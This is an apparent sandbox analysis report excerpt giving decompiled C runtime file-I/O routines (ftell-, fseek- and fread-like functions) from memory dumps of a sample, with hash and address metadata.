                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __fileno__getptd_noexit__locking
                            • String ID:
                            • API String ID: 630670418-0
                            • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                            • Instruction ID: 5befd7fe26f3e36482bc0343039d9cb618836bb1a614acbba8aa2c9e8a88d566
                            • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                            • Instruction Fuzzy Hash: 2F51B771E00A49AFDB10CFA8C9817B9BBB2EF05364F14C269D99597385D730EE41DB84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E0040C748(void* __edx, void* __esi, char _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				void* __ebx;
                            				void* __edi;
                            				void* __ebp;
                            				signed int _t70;
                            				signed int _t71;
                            				intOrPtr _t73;
                            				signed int _t75;
                            				signed int _t81;
                            				char _t82;
                            				signed int _t84;
                            				intOrPtr* _t86;
                            				signed int _t87;
                            				intOrPtr* _t90;
                            				signed int _t92;
                            				signed int _t94;
                            				void* _t96;
                            				signed char _t98;
                            				signed int _t99;
                            				intOrPtr _t102;
                            				signed int _t103;
                            				intOrPtr* _t104;
                            				signed int _t111;
                            				signed int _t114;
                            				intOrPtr _t115;
                            
                            				_t105 = __esi;
                            				_t97 = __edx;
                            				_t104 = _a4;
                            				_t87 = 0;
                            				_t121 = _t104;
                            				if(_t104 != 0) {
                            					_t70 = E0040FA20(__edx, _t104, _t104);
                            					__eflags =  *(_t104 + 4);
                            					_v8 = _t70;
                            					if(__eflags < 0) {
                            						 *(_t104 + 4) = 0;
                            					}
                            					_push(1);
                            					_push(_t87);
                            					_push(_t70);
                            					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                            					__eflags = _t71 - _t87;
                            					_v12 = _t71;
                            					if(_t71 < _t87) {
                            						L2:
                            						return _t71 | 0xffffffff;
                            					} else {
                            						_t98 =  *(_t104 + 0xc);
                            						__eflags = _t98 & 0x00000108;
                            						if((_t98 & 0x00000108) != 0) {
                            							_t73 =  *_t104;
                            							_t92 =  *(_t104 + 8);
                            							_push(_t105);
                            							_v16 = _t73 - _t92;
                            							__eflags = _t98 & 0x00000003;
                            							if((_t98 & 0x00000003) == 0) {
                            								__eflags = _t98;
                            								if(__eflags < 0) {
                            									L15:
                            									__eflags = _v12 - _t87;
                            									if(_v12 != _t87) {
                            										__eflags =  *(_t104 + 0xc) & 0x00000001;
                            										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                            											L40:
                            											_t75 = _v16 + _v12;
                            											__eflags = _t75;
                            											L41:
                            											return _t75;
                            										}
                            										_t99 =  *(_t104 + 4);
                            										__eflags = _t99 - _t87;
                            										if(_t99 != _t87) {
                            											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                            											_a4 = _t73 - _t92 + _t99;
                            											_t111 = (_v8 & 0x0000001f) << 6;
                            											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                            											if(__eflags == 0) {
                            												L39:
                            												_t66 =  &_v12;
                            												 *_t66 = _v12 - _a4;
                            												__eflags =  *_t66;
                            												goto L40;
                            											}
                            											_push(2);
                            											_push(0);
                            											_push(_v8);
                            											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                            											if(__eflags != 0) {
                            												_push(0);
                            												_push(_v12);
                            												_push(_v8);
                            												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                            												__eflags = _t81;
                            												if(_t81 >= 0) {
                            													_t82 = 0x200;
                            													__eflags = _a4 - 0x200;
                            													if(_a4 > 0x200) {
                            														L35:
                            														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                            														L36:
                            														_a4 = _t82;
                            														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                            														L37:
                            														if(__eflags != 0) {
                            															_t63 =  &_a4;
                            															 *_t63 = _a4 + 1;
                            															__eflags =  *_t63;
                            														}
                            														goto L39;
                            													}
                            													_t94 =  *(_t104 + 0xc);
                            													__eflags = _t94 & 0x00000008;
                            													if((_t94 & 0x00000008) == 0) {
                            														goto L35;
                            													}
                            													__eflags = _t94 & 0x00000400;
                            													if((_t94 & 0x00000400) == 0) {
                            														goto L36;
                            													}
                            													goto L35;
                            												}
                            												L31:
                            												_t75 = _t81 | 0xffffffff;
                            												goto L41;
                            											}
                            											_t84 =  *(_t104 + 8);
                            											_t96 = _a4 + _t84;
                            											while(1) {
                            												__eflags = _t84 - _t96;
                            												if(_t84 >= _t96) {
                            													break;
                            												}
                            												__eflags =  *_t84 - 0xa;
                            												if( *_t84 == 0xa) {
                            													_t44 =  &_a4;
                            													 *_t44 = _a4 + 1;
                            													__eflags =  *_t44;
                            												}
                            												_t84 = _t84 + 1;
                            												__eflags = _t84;
                            											}
                            											__eflags =  *(_t104 + 0xc) & 0x00002000;
                            											goto L37;
                            										}
                            										_v16 = _t87;
                            										goto L40;
                            									}
                            									_t75 = _v16;
                            									goto L41;
                            								}
                            								_t81 = E0040BFC1(__eflags);
                            								 *_t81 = 0x16;
                            								goto L31;
                            							}
                            							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                            							_t114 = (_v8 & 0x0000001f) << 6;
                            							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                            							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                            								goto L15;
                            							}
                            							_t103 = _t92;
                            							__eflags = _t103 - _t73;
                            							if(_t103 >= _t73) {
                            								goto L15;
                            							}
                            							_t115 = _t73;
                            							do {
                            								__eflags =  *_t103 - 0xa;
                            								if( *_t103 == 0xa) {
                            									_v16 = _v16 + 1;
                            									_t87 = 0;
                            									__eflags = 0;
                            								}
                            								_t103 = _t103 + 1;
                            								__eflags = _t103 - _t115;
                            							} while (_t103 < _t115);
                            							goto L15;
                            						}
                            						return _t71 -  *(_t104 + 4);
                            					}
                            				}
                            				_t86 = E0040BFC1(_t121);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				_push(0);
                            				 *_t86 = 0x16;
                            				_t71 = E0040E744(__edx, _t104, __esi);
                            				goto L2;
                            			}






























                            0x0040c748
                            0x0040c748
                            0x0040c752
                            0x0040c755
                            0x0040c757
                            0x0040c759
                            0x0040c77c
                            0x0040c781
                            0x0040c785
                            0x0040c788
                            0x0040c78a
                            0x0040c78a
                            0x0040c78d
                            0x0040c78f
                            0x0040c790
                            0x0040c791
                            0x0040c799
                            0x0040c79b
                            0x0040c79e
                            0x0040c773
                            0x00000000
                            0x0040c7a0
                            0x0040c7a0
                            0x0040c7a3
                            0x0040c7a9
                            0x0040c7b3
                            0x0040c7b5
                            0x0040c7b8
                            0x0040c7bd
                            0x0040c7c0
                            0x0040c7c3
                            0x0040c806
                            0x0040c808
                            0x0040c7f9
                            0x0040c7f9
                            0x0040c7fc
                            0x0040c81a
                            0x0040c81e
                            0x0040c8d8
                            0x0040c8de
                            0x0040c8de
                            0x0040c8e0
                            0x00000000
                            0x0040c8e0
                            0x0040c824
                            0x0040c827
                            0x0040c829
                            0x0040c843
                            0x0040c84a
                            0x0040c84f
                            0x0040c852
                            0x0040c857
                            0x0040c8d2
                            0x0040c8d5
                            0x0040c8d5
                            0x0040c8d5
                            0x00000000
                            0x0040c8d5
                            0x0040c859
                            0x0040c85b
                            0x0040c85d
                            0x0040c868
                            0x0040c86b
                            0x0040c88d
                            0x0040c88f
                            0x0040c892
                            0x0040c895
                            0x0040c89d
                            0x0040c89f
                            0x0040c8a6
                            0x0040c8ab
                            0x0040c8ae
                            0x0040c8c0
                            0x0040c8c0
                            0x0040c8c3
                            0x0040c8c3
                            0x0040c8c8
                            0x0040c8cd
                            0x0040c8cd
                            0x0040c8cf
                            0x0040c8cf
                            0x0040c8cf
                            0x0040c8cf
                            0x00000000
                            0x0040c8cd
                            0x0040c8b0
                            0x0040c8b3
                            0x0040c8b6
                            0x00000000
                            0x00000000
                            0x0040c8b8
                            0x0040c8be
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040c8be
                            0x0040c8a1
                            0x0040c8a1
                            0x00000000
                            0x0040c8a1
                            0x0040c86d
                            0x0040c873
                            0x0040c880
                            0x0040c880
                            0x0040c882
                            0x00000000
                            0x00000000
                            0x0040c877
                            0x0040c87a
                            0x0040c87c
                            0x0040c87c
                            0x0040c87c
                            0x0040c87c
                            0x0040c87f
                            0x0040c87f
                            0x0040c87f
                            0x0040c884
                            0x00000000
                            0x0040c884
                            0x0040c82b
                            0x00000000
                            0x0040c82b
                            0x0040c7fe
                            0x00000000
                            0x0040c7fe
                            0x0040c80a
                            0x0040c80f
                            0x00000000
                            0x0040c80f
                            0x0040c7ce
                            0x0040c7d8
                            0x0040c7db
                            0x0040c7e0
                            0x00000000
                            0x00000000
                            0x0040c7e2
                            0x0040c7e4
                            0x0040c7e6
                            0x00000000
                            0x00000000
                            0x0040c7e8
                            0x0040c7ea
                            0x0040c7ea
                            0x0040c7ed
                            0x0040c7ef
                            0x0040c7f2
                            0x0040c7f2
                            0x0040c7f2
                            0x0040c7f4
                            0x0040c7f5
                            0x0040c7f5
                            0x00000000
                            0x0040c7ea
                            0x00000000
                            0x0040c7ab
                            0x0040c79e
                            0x0040c75b
                            0x0040c760
                            0x0040c761
                            0x0040c762
                            0x0040c763
                            0x0040c764
                            0x0040c765
                            0x0040c76b
                            0x00000000

                            APIs
                            • __fileno.LIBCMT ref: 0040C77C
                            • __locking.LIBCMT ref: 0040C791
                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __decode_pointer__fileno__getptd_noexit__locking
                            • String ID:
                            • API String ID: 2395185920-0
                            • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                            • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                            • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                            • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: __fileno__flsbuf__flush__getptd_noexit__locking
                            • String ID:
                            • API String ID: 1291973410-0
                            • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                            • Instruction ID: d6ed28063667fa7440dff720e892143b03953f116774b7232dbf7fb9f5e1e599
                            • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                            • Instruction Fuzzy Hash: 6E41B531A00608EBDB249F69C8845EEB7B7EF80760F24A56DE555DB240E771DE818B44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_660000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: _fseek_malloc_memset
                            • String ID:
                            • API String ID: 208892515-0
                            • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                            • Instruction ID: e876286eb6cde568269fa34e1184cc7b538c064472cb24b8d72c4d713f8389aa
                            • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                            • Instruction Fuzzy Hash: 3341A372604B518BD7708A2DFA05757B2E7AF80364F140A3DF5A6C67D0EB31E885CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 97%
                            			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                            				void* __edi;
                            				void* __esi;
                            				signed int _t30;
                            				signed int _t31;
                            				signed int _t32;
                            				signed int _t33;
                            				signed int _t35;
                            				signed int _t39;
                            				void* _t42;
                            				intOrPtr _t43;
                            				void* _t45;
                            				signed int _t48;
                            				signed int* _t53;
                            				void* _t54;
                            				void* _t55;
                            				void* _t57;
                            
                            				_t54 = __ebp;
                            				_t45 = __edx;
                            				_t42 = __ebx;
                            				_t53 = _a4;
                            				if(_t53 == 0) {
                            					L40:
                            					_t31 = _t30 | 0xffffffff;
                            					__eflags = _t31;
                            					return _t31;
                            				} else {
                            					_t43 = _a12;
                            					if(_t43 == 2) {
                            						goto L40;
                            					} else {
                            						_t30 = _t53[0xe];
                            						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                            							goto L40;
                            						} else {
                            							_t48 = _a8;
                            							if(_t53[0x17] != 0x77) {
                            								__eflags = _t43 - 1;
                            								if(_t43 == 1) {
                            									_t48 = _t48 + _t53[0x1a];
                            									__eflags = _t48;
                            								}
                            								__eflags = _t48;
                            								if(_t48 < 0) {
                            									goto L39;
                            								} else {
                            									__eflags = _t53[0x16];
                            									if(__eflags == 0) {
                            										_t33 = _t53[0x1a];
                            										__eflags = _t48 - _t33;
                            										if(_t48 < _t33) {
                            											_t30 = E004054F0(_t42, _t54, _t53);
                            											_t55 = _t55 + 4;
                            											__eflags = _t30;
                            											if(_t30 < 0) {
                            												goto L39;
                            											} else {
                            												goto L27;
                            											}
                            										} else {
                            											_t48 = _t48 - _t33;
                            											L27:
                            											__eflags = _t48;
                            											if(_t48 == 0) {
                            												L38:
                            												return _t53[0x1a];
                            											} else {
                            												__eflags = _t53[0x12];
                            												if(_t53[0x12] != 0) {
                            													L30:
                            													__eflags = _t53[0x1b] - 0xffffffff;
                            													if(_t53[0x1b] != 0xffffffff) {
                            														_t53[0x1a] = _t53[0x1a] + 1;
                            														_t48 = _t48 - 1;
                            														__eflags = _t53[0x1c];
                            														_t53[0x1b] = 0xffffffff;
                            														if(_t53[0x1c] != 0) {
                            															_t53[0xe] = 1;
                            														}
                            													}
                            													__eflags = _t48;
                            													if(_t48 <= 0) {
                            														goto L38;
                            													} else {
                            														while(1) {
                            															_t35 = 0x4000;
                            															__eflags = _t48 - 0x4000;
                            															if(_t48 < 0x4000) {
                            																_t35 = _t48;
                            															}
                            															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                            															_t55 = _t55 + 0xc;
                            															__eflags = _t30;
                            															if(_t30 <= 0) {
                            																goto L39;
                            															}
                            															_t48 = _t48 - _t30;
                            															__eflags = _t48;
                            															if(_t48 > 0) {
                            																continue;
                            															} else {
                            																goto L38;
                            															}
                            															goto L41;
                            														}
                            														goto L39;
                            													}
                            												} else {
                            													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                            													_t55 = _t55 + 4;
                            													_t53[0x12] = _t30;
                            													__eflags = _t30;
                            													if(_t30 == 0) {
                            														goto L39;
                            													} else {
                            														goto L30;
                            													}
                            												}
                            											}
                            										}
                            									} else {
                            										_push(0);
                            										_push(_t48);
                            										_push(_t53[0x10]);
                            										_t53[0x1b] = 0xffffffff;
                            										_t53[1] = 0;
                            										 *_t53 = _t53[0x11];
                            										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                            										__eflags = _t30;
                            										if(_t30 < 0) {
                            											goto L39;
                            										} else {
                            											_t53[0x1a] = _t48;
                            											_t53[0x19] = _t48;
                            											return _t48;
                            										}
                            									}
                            								}
                            							} else {
                            								if(_t43 == 0) {
                            									_t48 = _t48 - _t53[0x19];
                            								}
                            								if(_t48 < 0) {
                            									L39:
                            									_t32 = _t30 | 0xffffffff;
                            									__eflags = _t32;
                            									return _t32;
                            								} else {
                            									if(_t53[0x11] != 0) {
                            										L11:
                            										if(_t48 <= 0) {
                            											L17:
                            											return _t53[0x19];
                            										} else {
                            											while(1) {
                            												_t39 = 0x4000;
                            												if(_t48 < 0x4000) {
                            													_t39 = _t48;
                            												}
                            												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                            												_t55 = _t55 + 0xc;
                            												if(_t30 == 0) {
                            													goto L39;
                            												}
                            												_t48 = _t48 - _t30;
                            												if(_t48 > 0) {
                            													continue;
                            												} else {
                            													goto L17;
                            												}
                            												goto L41;
                            											}
                            											goto L39;
                            										}
                            									} else {
                            										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                            										_t57 = _t55 + 4;
                            										_t53[0x11] = _t30;
                            										if(_t30 == 0) {
                            											goto L39;
                            										} else {
                            											E0040BA30(_t48, _t30, 0, 0x4000);
                            											_t55 = _t57 + 0xc;
                            											goto L11;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				L41:
                            			}



















                            0x00405d00
                            0x00405d00
                            0x00405d00
                            0x00405d01
                            0x00405d07
                            0x00405e7f
                            0x00405e7f
                            0x00405e7f
                            0x00405e83
                            0x00405d0d
                            0x00405d0d
                            0x00405d14
                            0x00000000
                            0x00405d1a
                            0x00405d1a
                            0x00405d20
                            0x00000000
                            0x00405d2f
                            0x00405d34
                            0x00405d38
                            0x00405dad
                            0x00405db0
                            0x00405db2
                            0x00405db2
                            0x00405db2
                            0x00405db5
                            0x00405db7
                            0x00000000
                            0x00405dbd
                            0x00405dbd
                            0x00405dc1
                            0x00405df8
                            0x00405dfb
                            0x00405dfd
                            0x00405e04
                            0x00405e09
                            0x00405e0c
                            0x00405e0e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405dff
                            0x00405dff
                            0x00405e10
                            0x00405e10
                            0x00405e12
                            0x00405e73
                            0x00405e78
                            0x00405e14
                            0x00405e14
                            0x00405e18
                            0x00405e2e
                            0x00405e2e
                            0x00405e32
                            0x00405e34
                            0x00405e37
                            0x00405e38
                            0x00405e3c
                            0x00405e43
                            0x00405e45
                            0x00405e45
                            0x00405e43
                            0x00405e4c
                            0x00405e4e
                            0x00000000
                            0x00405e50
                            0x00405e50
                            0x00405e50
                            0x00405e55
                            0x00405e57
                            0x00405e59
                            0x00405e59
                            0x00405e61
                            0x00405e66
                            0x00405e69
                            0x00405e6b
                            0x00000000
                            0x00000000
                            0x00405e6d
                            0x00405e6f
                            0x00405e71
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405e71
                            0x00000000
                            0x00405e50
                            0x00405e1a
                            0x00405e1f
                            0x00405e24
                            0x00405e27
                            0x00405e2a
                            0x00405e2c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405e2c
                            0x00405e18
                            0x00405e12
                            0x00405dc3
                            0x00405dc9
                            0x00405dcb
                            0x00405dcc
                            0x00405dcd
                            0x00405dd4
                            0x00405ddb
                            0x00405ddd
                            0x00405de5
                            0x00405de7
                            0x00000000
                            0x00405ded
                            0x00405ded
                            0x00405df0
                            0x00405df7
                            0x00405df7
                            0x00405de7
                            0x00405dc1
                            0x00405d3a
                            0x00405d3c
                            0x00405d3e
                            0x00405d3e
                            0x00405d43
                            0x00405e79
                            0x00405e7a
                            0x00405e7a
                            0x00405e7e
                            0x00405d49
                            0x00405d4d
                            0x00405d77
                            0x00405d79
                            0x00405da7
                            0x00405dac
                            0x00405d7b
                            0x00405d80
                            0x00405d80
                            0x00405d87
                            0x00405d89
                            0x00405d89
                            0x00405d91
                            0x00405d96
                            0x00405d9b
                            0x00000000
                            0x00000000
                            0x00405da1
                            0x00405da5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405da5
                            0x00000000
                            0x00405d80
                            0x00405d4f
                            0x00405d54
                            0x00405d59
                            0x00405d5c
                            0x00405d61
                            0x00000000
                            0x00405d67
                            0x00405d6f
                            0x00405d74
                            0x00000000
                            0x00405d74
                            0x00405d61
                            0x00405d4d
                            0x00405d43
                            0x00405d38
                            0x00405d20
                            0x00405d14
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_afCf.jbxd
                            Yara matches
                            Similarity
                            • API ID: _fseek_malloc_memset
                            • String ID:
                            • API String ID: 208892515-0
                            • Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                            • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                            • Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
                            • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t59;
                            				intOrPtr* _t61;
                            				signed int _t63;
                            				void* _t68;
                            				signed int _t69;
                            				signed int _t72;
                            				signed int _t74;
                            				signed int _t75;
                            				signed int _t77;
                            				signed int _t78;
                            				signed int _t81;
                            				signed int _t82;
                            				signed int _t84;
                            				signed int _t88;
                            				signed int _t97;
                            				signed int _t98;
                            				signed int _t99;
                            				intOrPtr* _t100;
                            				void* _t101;
                            
                            				_t90 = __edx;
                            				if(_a8 == 0 || _a12 == 0) {
                            					L4:
                            					return 0;
                            				} else {
                            					_t100 = _a16;
                            					_t105 = _t100;
                            					if(_t100 != 0) {
                            						_t82 = _a4;
                            						__eflags = _t82;
                            						if(__eflags == 0) {
                            							goto L3;
                            						}
                            						_t63 = _t59 | 0xffffffff;
                            						_t90 = _t63 % _a8;
                            						__eflags = _a12 - _t63 / _a8;
                            						if(__eflags > 0) {
                            							goto L3;
                            						}
                            						_t97 = _a8 * _a12;
                            						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                            						_v8 = _t82;
                            						_v16 = _t97;
                            						_t81 = _t97;
                            						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                            							_v12 = 0x1000;
                            						} else {
                            							_v12 =  *(_t100 + 0x18);
                            						}
                            						__eflags = _t97;
                            						if(_t97 == 0) {
                            							L32:
                            							return _a12;
                            						} else {
                            							do {
                            								_t84 =  *(_t100 + 0xc) & 0x00000108;
                            								__eflags = _t84;
                            								if(_t84 == 0) {
                            									L18:
                            									__eflags = _t81 - _v12;
                            									if(_t81 < _v12) {
                            										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                            										__eflags = _t68 - 0xffffffff;
                            										if(_t68 == 0xffffffff) {
                            											L34:
                            											_t69 = _t97;
                            											L35:
                            											return (_t69 - _t81) / _a8;
                            										}
                            										_v8 = _v8 + 1;
                            										_t72 =  *(_t100 + 0x18);
                            										_t81 = _t81 - 1;
                            										_v12 = _t72;
                            										__eflags = _t72;
                            										if(_t72 <= 0) {
                            											_v12 = 1;
                            										}
                            										goto L31;
                            									}
                            									__eflags = _t84;
                            									if(_t84 == 0) {
                            										L21:
                            										__eflags = _v12;
                            										_t98 = _t81;
                            										if(_v12 != 0) {
                            											_t75 = _t81;
                            											_t90 = _t75 % _v12;
                            											_t98 = _t98 - _t75 % _v12;
                            											__eflags = _t98;
                            										}
                            										_push(_t98);
                            										_push(_v8);
                            										_push(E0040FA20(_t90, _t98, _t100));
                            										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                            										_t101 = _t101 + 0xc;
                            										__eflags = _t74 - 0xffffffff;
                            										if(_t74 == 0xffffffff) {
                            											L36:
                            											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                            											_t69 = _v16;
                            											goto L35;
                            										} else {
                            											_t88 = _t98;
                            											__eflags = _t74 - _t98;
                            											if(_t74 <= _t98) {
                            												_t88 = _t74;
                            											}
                            											_v8 = _v8 + _t88;
                            											_t81 = _t81 - _t88;
                            											__eflags = _t74 - _t98;
                            											if(_t74 < _t98) {
                            												goto L36;
                            											} else {
                            												L27:
                            												_t97 = _v16;
                            												goto L31;
                            											}
                            										}
                            									}
                            									_t77 = E0040C1FB(_t100);
                            									__eflags = _t77;
                            									if(_t77 != 0) {
                            										goto L34;
                            									}
                            									goto L21;
                            								}
                            								_t78 =  *(_t100 + 4);
                            								__eflags = _t78;
                            								if(__eflags == 0) {
                            									goto L18;
                            								}
                            								if(__eflags < 0) {
                            									_t48 = _t100 + 0xc;
                            									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                            									__eflags =  *_t48;
                            									goto L34;
                            								}
                            								_t99 = _t81;
                            								__eflags = _t81 - _t78;
                            								if(_t81 >= _t78) {
                            									_t99 = _t78;
                            								}
                            								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                            								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                            								 *_t100 =  *_t100 + _t99;
                            								_t101 = _t101 + 0xc;
                            								_t81 = _t81 - _t99;
                            								_v8 = _v8 + _t99;
                            								goto L27;
                            								L31:
                            								__eflags = _t81;
                            							} while (_t81 != 0);
                            							goto L32;
                            						}
                            					}
                            					L3:
                            					_t61 = E0040BFC1(_t105);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					 *_t61 = 0x16;
                            					E0040E744(_t90, 0, _t100);
                            					goto L4;
                            				}
                            			}





























                            0x0040baaa
                            0x0040baba
                            0x0040bae0
                            0x00000000
                            0x0040bac1
                            0x0040bac1
                            0x0040bac4
                            0x0040bac6
                            0x0040bae7
                            0x0040baea
                            0x0040baec
                            0x00000000
                            0x00000000
                            0x0040baee
                            0x0040baf3
                            0x0040baf6
                            0x0040baf9
                            0x00000000
                            0x00000000
                            0x0040bafe
                            0x0040bb02
                            0x0040bb09
                            0x0040bb0c
                            0x0040bb0f
                            0x0040bb11
                            0x0040bb1b
                            0x0040bb13
                            0x0040bb16
                            0x0040bb16
                            0x0040bb22
                            0x0040bb24
                            0x0040bbe9
                            0x00000000
                            0x0040bb2a
                            0x0040bb2a
                            0x0040bb2d
                            0x0040bb2d
                            0x0040bb33
                            0x0040bb64
                            0x0040bb64
                            0x0040bb67
                            0x0040bbc0
                            0x0040bbc7
                            0x0040bbca
                            0x0040bbf5
                            0x0040bbf5
                            0x0040bbf7
                            0x00000000
                            0x0040bbfb
                            0x0040bbcc
                            0x0040bbcf
                            0x0040bbd2
                            0x0040bbd3
                            0x0040bbd6
                            0x0040bbd8
                            0x0040bbda
                            0x0040bbda
                            0x00000000
                            0x0040bbd8
                            0x0040bb69
                            0x0040bb6b
                            0x0040bb78
                            0x0040bb78
                            0x0040bb7c
                            0x0040bb7e
                            0x0040bb82
                            0x0040bb84
                            0x0040bb87
                            0x0040bb87
                            0x0040bb87
                            0x0040bb89
                            0x0040bb8a
                            0x0040bb94
                            0x0040bb95
                            0x0040bb9a
                            0x0040bb9d
                            0x0040bba0
                            0x0040bc03
                            0x0040bc03
                            0x0040bc07
                            0x00000000
                            0x0040bba2
                            0x0040bba2
                            0x0040bba4
                            0x0040bba6
                            0x0040bba8
                            0x0040bba8
                            0x0040bbaa
                            0x0040bbad
                            0x0040bbaf
                            0x0040bbb1
                            0x00000000
                            0x0040bbb3
                            0x0040bbb3
                            0x0040bbb3
                            0x00000000
                            0x0040bbb3
                            0x0040bbb1
                            0x0040bba0
                            0x0040bb6e
                            0x0040bb74
                            0x0040bb76
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040bb76
                            0x0040bb35
                            0x0040bb38
                            0x0040bb3a
                            0x00000000
                            0x00000000
                            0x0040bb3c
                            0x0040bbf1
                            0x0040bbf1
                            0x0040bbf1
                            0x00000000
                            0x0040bbf1
                            0x0040bb42
                            0x0040bb44
                            0x0040bb46
                            0x0040bb48
                            0x0040bb48
                            0x0040bb50
                            0x0040bb55
                            0x0040bb58
                            0x0040bb5a
                            0x0040bb5d
                            0x0040bb5f
                            0x00000000
                            0x0040bbe1
                            0x0040bbe1
                            0x0040bbe1
                            0x00000000
                            0x0040bb2a
                            0x0040bb24
                            0x0040bac8
                            0x0040bac8
                            0x0040bacd
                            0x0040bace
                            0x0040bacf
                            0x0040bad0
                            0x0040bad1
                            0x0040bad2
                            0x0040bad8
                            0x00000000
                            0x0040badd

                            APIs
